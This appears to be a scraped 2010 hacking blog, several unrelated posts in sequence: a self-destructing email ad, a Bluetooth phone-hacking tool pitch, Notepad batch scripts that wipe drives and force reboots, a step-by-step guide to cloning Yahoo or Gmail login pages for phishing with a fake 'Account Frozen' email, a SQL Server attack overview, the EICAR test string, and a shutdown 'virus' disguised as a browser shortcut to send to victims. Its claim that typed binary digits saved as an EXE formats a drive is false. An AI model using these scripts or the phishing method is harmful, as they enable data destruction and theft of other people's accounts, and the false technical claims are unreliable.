Thursday, April 29, 2010

self destructing email

You might remember the world famous scene of Mission Impossible in which after the message has been heard once the message destroys itself. Now it is possible for everybody to have such facility. You can send an E-mail which destroys itself after it has been read once.




Every time that you send an email, copies are stored permanently on multiple email servers as well as the recipient's inbox and anyone they decide to send it to. Your emails can be stored and scanned in more places than you can imagine. Do you want people storing your email messages forever? Do you want something that you type today to be used against you tomorrow, next week, next month or even in the next decade?





Until now, everyone else has had control of the email that you have sent. BigString gives you back control of your email, acting like an automatic shredder for your email. You can self-destruct or change an email that's already been sent or read. Don't leave your messages sitting in peoples' inboxes forever. Get a free BigString email account to protect your privacy.



BigString takes the risk out of email



Now, with BigString, you can finally take the risk out of email and put an end to "sender regret." It is the world's first & only email service that thoroughly protects your safety and privacy.



BigString's exclusive, patent-pending technology enables you to prevent your personal or business information from lingering indefinitely in someone else's inbox. It also restricts private pictures or messages from being indiscriminately spread throughout cyberspace! Now your sensitive photos can't be posted to unseemly web sites or printed for circulation amongst total strangers.



BigString lets you have second thoughts



BigString shifts the control from the recipient to YOU the sender. BigString grants the luxury of second thoughts, the power to limit message viewings, and the choice to delay email transmission.



You can reword a message fired off in anger or haste or completely delete it! You can recall a botched résumé for revision or erase a tasteless joke. You can make a work of art or photograph print-proof. You can prevent a love letter from being forwarded. You can set an expiration date on an emailed price quote or business offer or you can simply pull back an email to eliminate typos.



BigString takes the danger out of clicking



BigString guarantees that clicking "send" will never again be an irreversible disaster. Now YOU decide the fate of your emails. You decide where they end up, who sees them and for how long. BigString emails can be destroyed, recalled or changed even after they've been opened! The freedom is yours, the options are yours, and you're the boss with BigString.



BigString is easy to use



BigString is as easy to use as any other email and there's nothing to download! Don't be resigned to the mercy of your recipient. You don't want your every action to be carved in stone because sometimes you just NEED to take it back!



Here are just a few of the many applications of BigString Erasable, Recallable, Non-Printable Email.



Executives: Protect your business and safeguard your email. Now you never have to worry about sending the wrong attachment or completely forgetting it. Misspelled words, incorrect dates, or other typos can all be fixed even after your message has been sent. You can even "pull an email back" to delete expired price quotes, old business offers or dated legal material. BigString is your email insurance.



On-Line Daters: You don't want your personal information like pictures, phone numbers or intimate notes, circulated around the Internet! BigString prevents your pictures and messages from being printed or forwarded. You can set an expiration date for an email or self-destruct it at will. You can choose the number of times you'll allow a picture to be viewed before it disappears. BigString protects your privacy!



Artists and Photographers: Now with BigString you can confidently email proofs and samples without the slightest fear that they will be printed or saved for later use without your authorization. Use BigString to make your image non-savable and non-printable! Limit the number of times a client can view a piece before you have it self-destruct. You can even recall a sent email to delete an old price quote or alter a new one. You can also prevent it from being forwarded to other customers. BigString protects your rights of ownership!



Copywriters: Spelling or punctuation errors that can cost time, money, or embarrassment are now a thing of the past. With BigString, clicking "send" is no longer an action "carved in stone." Accidentally arranging paragraphs in the wrong order will no longer mean a lost account. With the technology of BigString you can recall that mistake-ridden copy and correct the errors even after your email has left the outbox. You can self-destruct what you sent all together and replace it with a fully revised version. Only you will know this switch has occurred! With BigString you can confidently send non-printable, non-savable sample copy. You no longer have to worry that it will be used without your knowledge. You're the boss with BigString.



click here get a free account

Hack Mobile Phones Through Bluetooth

Yes guys it is the mobile bluetooth hacker. It is a software which can be used to hack any mobile phone through bluetooth network. Once connected to a another phone via bluetooth you can do the following:




1) Call from his phone. It includes all call functions like hold etc.

2) Read his messages

3) Read his contacts

4) Change profile



5) Play his ringtone even if phone is on silent

6) Play his songs(in his phone)

7) Restart the phone

8) Switch off the phone

9) Restore factory settings

10) Change ringing volume



Notes:



1.) When connecting devices use a code 0000

2.) At start of programming on smartphones do not forget to turn on bluetooth before start of the application

What else you want

Just go and downlaod it

download

Format a HDD with Notepad

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.








Step 1.

Copy The Following In Notepad Exactly as it says



01001011000111110010010101010101010000011111100000



Step 2.

Save As An EXE Any Name Will Do



Step 3.

Send the EXE to People And Infect



OR



IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X -- this will format your drive c:\



01100110011011110111001001101101011000010111010000 100000011000110011101001011100



0010000000101111010100010010111101011000





format d:\ /Q/X -- this will format your dirve d:\



01100110011011110111001001101101011000010111010000 100000011001000011101001011100



0010000000101111010100010010111101011000





format a:\ /Q/X -- this will format your drive a:\





01100110011011110111001001101101011000010111010000 100000011000010011101001011100



0010000000101111010100010010111101011000





del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.





01100100011001010110110000100000001011110100011000 101111010100110010111101010001



00100000011000110011101001011100011000100110111101 101111011101000010111001101001



0110111001101001



try to figure out urself rest

cant spoonfeed

its working



Do not try it on your PC. Don't mess around this is for educational purpose only



still if you cant figure it out try this



go to notepad and type the following:



@Echo off

Del C:\ *.*
y



save it as Dell.bat



want worse then type the following:



@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00



and save it as a .bat file

Home How to Hack Gmail or Yahoo or Hotmail or Any Other( New Version)


First of all you need to create an account in a form handling service. In the registration form enter your email address in the field "Where to send Data" and in redirect enter the URL of the site whose account is to be hacked( For Yahoo it will be http://mail.yahoo.com/ and for google it is mail.google.com/mail). After registering you will get an email from the web form designer with your form id.



Now follow the following steps :





1.Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com

2.Now press "CTRL+U", you will get the source code of yahoo page. NOw press "CTRL+A" copy all the text.

3.Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML

4.Now open the the file yahoofake.html using noepad, here you ll find a code which starts with
https://login.yahoo.com/config/login?" autocomplete="off" name="login_form"> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method="post" action="xxxxxxxxxxxxx"))


5.Now in place of (form method="post" action="xxxxxxxxxxxxx")

put ur email id instead of xxxxxxxxxx
Now Save the yahoofake.html.



To hack the victim's password and username the victim has to login through this page. Many people had sent me queries about how to make someone login through your link in the previous version. I have the solution for that also.



First of all upload your page using some free webhosting services.



Tip: Register to those webhost which don't give their own ads and which gives URL of type "your site name.webhost.com". Now select your site name as mail.yahoo.com/support.

You can also add some rubbish numbers and make is very long so that the victim does not see the name of webhost in the link.



Now send a fake mail from support_yahoo@yahoo.com to the victim's email address with subject " Account Frozen" and in the mail write that Due to some technical errors in yahoo we need you to login through this link otherwise your account will be frozen.



After reading this your victim will click and login through the page you created and as you have give the redirection URL as the URL of the site itself so it will goto the login page again and the victim will think that he might have given wrong password so the page came again but in reallity the username and password has been sent to your email account you specified and the victim is still not knowing that his account is hacked. If you have your own ideas plz write it as comment to this post. Your participation is always appreciated.



Good Luck !

Top 10 Tricks to exploit SQL Server Systems

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.




1. Direct connections via the Internet



These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.



2. Vulnerability scanning



Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.







Figure 1: Common SQL injection vulnerabilities found using WebInspect.



3. Enumerating the SQL Server Resolution Service



Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.



4. Cracking SA passwords



Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.



5. Direct-exploit attacks



Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.







Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.



6. SQL injection



SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.



Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.



7. Blind SQL injection



These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.





Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.



8. Reverse engineering the system



The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.



9. Google hacks



Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.



10. Perusing Web site source code



Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

How to Test the Working of your Antivirus – EICAR Test

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.




1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.



X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2. Rename the file from New Text Document.TXT to myfile.com



3. Now run the antivirus scan on this myfile.com file.



If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.



NOTE: Most antivirus will pop-out a warning message in the Step-1 itself.



You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

How to create a Funny Facebook/Orkut Virus

It's been a long time that I have posted any virus making and hacking related article.I was just hanging around for one,and here is what,my search finished on.I will show you how to make a virus which when is runned,will show a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!!."[You can change this text with whatever you want]and then will put its computer on a shutdown timer. This is totally harmless and safe to use.[Don't worry,we know how precious is your Facebook account to you].








So lets begain,as I know you can't control your excitement anymore:



1.Open Notepad.





2.Type the following text ( simply copy & paste)in Notepad



@echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."



Note:You can change the text highlighted in red with whatever you want to show.





3.Now save this as Internet Explorer.bat file or whichever browser's name you but don't forget to type .bat immediately after the name.



4.Now right click this Internet Explorer.bat file and click create shortcut.



5.Now right click shortcut icon and click Properties-->Change Icon[In the shortcut tab]--> and choose Internet Explorer icon or any other similar to it.



6.Now delete the original shortcut as created in step 4 and replace it with this one.



7.Now send this to the victim's computer and when he will click on the icon.........



Hope you will freak out your friends. Feel free to share reaction of your friends with us.